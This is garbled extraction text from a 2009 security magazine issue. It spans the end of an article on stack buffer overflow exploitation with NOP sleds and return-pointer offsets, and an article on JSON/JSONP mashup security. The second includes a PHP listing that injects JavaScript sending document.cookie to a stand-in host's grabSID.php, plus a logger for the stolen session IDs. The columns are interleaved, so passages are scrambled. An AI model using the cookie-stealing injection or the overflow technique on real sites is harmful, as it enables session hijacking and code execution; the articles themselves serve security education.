0x41414141. One would think that as long exploit code and also a closer look at our organizations, there will always be as we’re overwriting the return pointer with the program inside of GDB. opportunities for attackers to attack via A’s that execution should try to jump to Take a look at the comments added this method. Many script kiddies and
0x41414141, however, the behavior is not into the code to see what’s going on attackers have moved onto simpler always predictable (see Figure 11). check the Listing 7. forms of exploitation on the web such as Decrease the size of the buffer and In thie image (see Figure 12) it looks cross-site scripting and SQL injection. the number of A’s we’re passing to the like we set our offset too high. As you can The obvious reasoning behind this is that vulnerable program to 48. As you can see, we have set our return pointer guess attackers are opportunistic and go for the see on the image above, execution tried to an address that’s far into our shellcode. biggest return on investment. to jump to 0x41414141. It may not happen We want it to land inside the NOP sled. Both of the techniques used in this every time, so give it a few runs before Again, this is not an exact science and article rely on a buffer overflow condition assuming there is a problem. The code to results may vary on the program you to exist in order to be successful. Many do this is shown in the Listing 6. are analyzing. With ASLR enabled and of these conditions can be eliminated by
Since we’ve established the fact using execl() to open up the vulnerable simply using secure coding best practices. that we can still control execution when program, you may experience inconsistent Historically, educational institutions did wrapping the vulnerable program within a results. The one we’re attacking is actually not teach with security in mind in regards program we create, we can begin to set quite stable and you should have success to programming. This is changing for the up our attack framework. For this we must using this method (see Figure 13). better, however, mistakes are still made fill the buffer of the vulnerable program Let’s try again, changing our offset from and poor functions selected for string and with our return pointer, so we hopefully 200 to 60. As you can see on the slide, our memory copying operations. Simply using have it in the right spot. Place a NOP sled return pointer guess points within our NOP strncpy() instead of strcpy() does not after the return pointer overwrite as our sled! Let’s give it a whirl…(see Listing 8). automatically protect you. Many amateur landing zone. We then must place the Success! Giving it a few tries results programmers inadvertently introduce shellcode we want to execute after the in our shellcode execution. With more vulnerabilities into their code by a lack of NOP sled and figure out to what address effort, it is possible to increase the experience and testing. As with the majority to set the return pointer. success rate of running this exploit by of application and OS vulnerabilities, input We have already figured out that we modifying the offset. Remember, the validation and bounds checking seem to do not know where the stack segment process is being replaced through always top the list when identifying where will be mapped. What we can do is execl() and even when setting the flaws are being introduced. A strong code create a variable within our wrapper return pointer guess to an address that review process, combined with fuzzing and program that will be pushed into doesn’t directly fall within the NOP sled, penetration testing can help minimize the memory prior to the call to execl(). We success may occur, (see Figure 14). number of vulnerabilities that exist within an application. On The 'Net The links below provide some good papers on the topics and techniques covered in this article, Stephen Sims as well as several others. Stephen Sims is an Information Security Consultant currently residing in San Francisco, CA. He has spent • Smashing the Stack for Fun and Profit by Aleph One – http://www.phrack.org/issues.html?id=1 the past eight years in San Francisco working for 4&issue=49 many large institutions and on various contracts providing Network and Systems Security, Penetration • Smashing the Modern Stack for Fun and Profit by Unknown – http://www.milw0rm.com/ Testing and Exploitation Development. He is a SANS papers/82 Certified Instructor and author of the course SEC709, • Bypassing non-executable-stack during exploitation using return-to-libc by c0ntex http: Developing Exploits for Penetration Testers and Security //exp.byhack.net/papers/31 Researchers. He also travels internationally teaching various courses and speaking at conferences such • Smack the Stack by Izik – http://www.orbitalsecurity.com/documentation_view.php?id=27 as RSA. Stephen holds the GIAC Security Expert (GSE) • ASLR bypassing method on 2.6.17/20 Linux Kernel by FHM crew – http:// certification, Network Offense Professional (NOP) www.milw0rm.com/papers/219 certification from Immunity, amongst others. [email protected]
5/2009 HAKIN9 29 ATTACK
ANTONIO FANELLI Mashup Security
Difficulty
Mashups will have a significant role in the future of Web 2.0, thanks to one of the most recent data interchange techniques: JSON. But what about security?
n the Web 2.0 Era, people require more web Probably he would locate it on Google Maps, and services integration for finding information via then he would look for some pictures on Flickr or I web search engines faster. perform a virtual tour on the official tourist website Imagine a user who is planning a trip. He and so on with practical information about hotels, starts seeking information about the destination. restaurants, monuments, and others. A few days
JSON vs. XML JSON and XML are data interchange techniques widely used in today's web services. Both can be used as a simple and standard exchange format to enable users to move their data between similar applications. There are some differences that make them better for different purposes. So the question is: how to use the right tool for the right job? Here there are some hints which can also be found at http://www.json.org/xml.html. XML is better for:
• extensibility. XML is a document markup language, so you can define new tags or attributes to represent data in it, • document exchange format. XML was born to create new languages specialized in describing structured documents. • displaying many views of the one data because, as for extensibility, it is a document markup language. • complete integration of data. XML documents can contain any imaginable data type thanks to the <[CDATA()]> feature. • more standard projects. Actually XML is widely adopted by the computer industry because it is older than JSON and recognized as a standard from the World Wide Web Consortium (W3C).
JSON is better for: • simplicity. JSON has a much smaller grammar and maps more directly onto the data structures used in modern programming languages, WHAT YOU SHOULD • openness. JSON is not in the center of corporate/political standardization struggles, so it is more open KNOW... than XML, Basics of JavaScript and AJAX • more human readable data format. JSON is also easier for machines to read and write, Basics of PHP • being easily processed. JSON structure is simpler than XML, • less code writing. JSON is a simpler notation, so it needs much less specialized software. In some WHAT YOU WILL languages JSON notation is built into the programming language, LEARN... • less data mapping work. JSON structures are based on arrays and records that is what data is made of, JSON data interchange format • data exchange format. JSON was born for data interchange, • object-oriented projects. Being data-oriented, JSON can be mapped more easily to object-oriented JSONP technique for mashups systems. JavaScript injection with JSONP
30 HAKIN9 5/2009 WEB APPLICATION HYBRID
before leaving he is likely to look for weather forecast, latest news and events. Given the wide variety of available content, it is easier today to hit on mashups, (hybrid web sites) that integrate specialized services such as geocoding, weather forecast, tourist reservations, news feeds and others. It is easy for end-users to find all these services in a single place without having to worry about conducting extensive research on the Internet. But sometimes functionality is in inverse proportion to security. As you will see later, rush mashups could cause theft of a user’s personal data.
JSON's Role For many years XML has been the standard for data interchange. Originally, it was introduced as a meta-language for document structure description, but soon it was also used for the information exchange among different systems. A few years ago a new data exchange format was born: JSON. It stands for JavaScript Object Notation and its simplicity brought rapid use Figure 1. Basic flight search form with dynamically filled select box with JSON data in programming especially with AJAX technology. Compared to XML, JSON is a Listing 1. A basic flight search form with dynamic select box better data exchange format while XML is a better document exchange format (See the It is based on the standard JavaScript
language, but is independent of it. Its use via JavaScript is particularly5/2009 HAKIN9 31 ATTACK WEB APPLICATION HYBRID
An example of JSON object could be Which is nothing but a collection of key- var json = '{"name":"Antonio", as follows: value pairs. In various languages this is "surname":"Fanelli", "message": done as an object, record, struct, dictionary, "Hello JSON!"}'; { "name":"Antonio", hash table, keyed list, or associative array. var myObj = eval('(' + json + ')'); "surname":"Fanelli", Reading a JSON stream from JavaScript is alert('Message from ' + myObj.name "message":"Hello JSON!" } very simple, as the following demonstrates: + ' ' + myObj.surname + ':\n' + myObj.message); Listing 2. AJAX script which handles the JSON object In the first row a JSON text is stored into //asynchronous request to the server a variable. Then the eval() function is function makeRequest(url){ called to parse the text and transform it var httpRequest; var theObject; into a JavaScript object. Finally the JSON var html = ""; object is used to display an alert into the var container = document.getElementById("selCompanies"); page. container.innerHTML = ''; In practice JSON can be used with if (window.XMLHttpRequest) { web services as an alternative to XML and // Mozilla and other browsers SOAP, but also with any web application httpRequest = new XMLHttpRequest(); where there is data interchange between if (httpRequest.overrideMimeType) { httpRequest.overrideMimeType('text/xml'); a client and server. } Note that a browser’s Same Origin } Policy blocks multi-domain calls, so (window.ActiveXObject) { else if client and server pages must be // IE try located on the same server to work { properly. Anyway you can bypass these httpRequest = new ActiveXObject("Msxml2.XMLHTTP"); restrictions thanks to a simple but } brilliant JSON hacking technique, as catch (e) { try { you will see later. But first let's see an httpRequest = new ActiveXObject("Microsoft.XMLHTTP"); example. } Let's suppose we have a web page catch (e) {} } with a flight search form. Inside the form } there is a select box which we want to if (!httpRequest) { dynamically populate by asynchronous alert("Cannot create an XMLHTTP instance"); calls to the server, receiving JSON text } httpRequest.onreadystatechange = function() { data as responses. We have to code two if (httpRequest.readyState == 4) { kinds of scripts. An HTML client-side script if ( httpRequest.status == 200 ) { as a user interface and a PHP server- //parsing the JSON text from the server response theObject = eval( '(' + httpRequest.responseText + ')' ); side script for retrieving data from the //looping the JSON object to populate the select box database. for(i=0; i < theObject.length; i++) { Figure 1 shows the form in the HTML html += ""; } companies select box is filled in with //filling the select box data. Don't worry about the remaining container.innerHTML += html; fields; they are not important for this } else { example. You can use Firebug, a very alert("There was a problem with the service"); } useful Firefox extension, to analyze the } page code at runtime. From the HTML }; console inside Firebug, you can see the httpRequest.open('GET', url, true); httpRequest.send(null); asynchronous call to the server and its } JSON response with the list of the airline companies. //call asynchronous request Listings 1 and 2 show the client-side function showData() { var jsonUrl = 'jsonCompanies.php'; code while Listing 3 the server-side one. makeRequest(jsonUrl); The code in Listing 1 represents } a simple HTML form. Note that the companies select box is empty:
32 HAKIN9 5/2009 5/2009 HAKIN9 33 ATTACK WEB APPLICATION HYBRID
include 'config.php'; for(i=0; i < theObject.length; i++) { //Connect to mySQL html += ""; if ($db == FALSE) } die ("DB connection error!"); mysql_select_db($db_name, $db) In practice we are building the option or die ("DB selection error!"); fields inside the select box, giving them the //Retrieve data from DB airline codes as values and airline names as descriptions. $query = "SELECT * FROM company ORDER BY name LIMIT 100"; Finally, with the following line of code: $result = mysql_query($query, $db); $num = mysql_affected_rows();
//Convert result set to JSON text container.innerHTML += html;
we dynamically assign the HTML code to echo trim(getJSON($result, $num)); our newly built container defined at the top //Close DB connection of the code block: mysql_close($db); ?> var container = document.getElement ById("selCompanies");
32 HAKIN9 5/2009 5/2009 HAKIN9 33 ATTACK WEB APPLICATION HYBRID
Listing 3 shows the PHP code for The conversion is made by the getJSON according to the JSON standard, filling it retrieving data from the database function which is a slightly adapted with data coming from a MySQL record and return the JSON object. It is a version of the one inside the Adnan set. Then the string is returned to the simple PHP script that connects to Siddiqi's class which you can download client through the following line of code: a MySQL database, collects a list of from here: http://www.phpclasses.org/ airline companies and converts the browse/package/3195.html. It does echo trim(getJSON($result, $num)); resulting record set into a JSON text. nothing more than format a string In other words the HTML page makes an Listing 4. Modified version of the search flight form for use with JSONP asynchronous GET call to the PHP page which connects to a MySQL database, text to the client. All this with the minimal
band request and absolutely clear to the end user.//Retrieve data from DB Imagine you get a web site that include 'mySqlData.php'; requires user authentication and you decide to integrate some external services //Callback function name such as news, maps, and others. User $callback = $_GET['cb']; authentication usually requires a session //Attack script ID to be stored into cookies on the client $attack = "var script = document.createElement('script');script.setAttribute('src', side (i.e., browsers). If a malicious person 'http://www.example.com/grabSID.php?sid='+document.cookie);doc has access to the user session ID when ument.getElementsByTagName('head')[0].appendChild(script);"; the latter is authenticated he could steal if ($callback != '') the user’s personal data. //Response with JSONP echo $attack . $callback . '( ' . trim(getJSON($result, $num)) . ' );'; For Example else //Response with JSON Let's suppose the flight search form is echo $attack . trim(getJSON($result, $num)); accessible only after user authentication.
//Close DB connection We can simulate the authentication by opening a new session on the page. mysql_close($db); ?> The only thing to do is to rename the searchFlight.htm file in searchFlight.php Listing 6. It appends to a text file the input parameter and add the following line of code at the
fclose($file); ?> Now modify the server service in order to perform a JavaScript injection together with the regular response of the airline
36 HAKIN9 5/2009 5/2009 HAKIN9 37 ATTACK WEB APPLICATION HYBRID
companies. We want to steal the user echo $attack . $callback . '( ' . Figure 3 shows what happens. As session ID and store it on our server. trim(getJSON($result, you can see from the Firebug console, Listing 5 shows how you can do that. $num)) . ' );'; in addition to the regular script which In practice, we have stored a malicious populates the select box with the airline script in the variable: The script does nothing but create at companies, a second malicious script runtime in the client page a new dynamic grabs the user session ID and sends it to
$attack = "var script = document.crea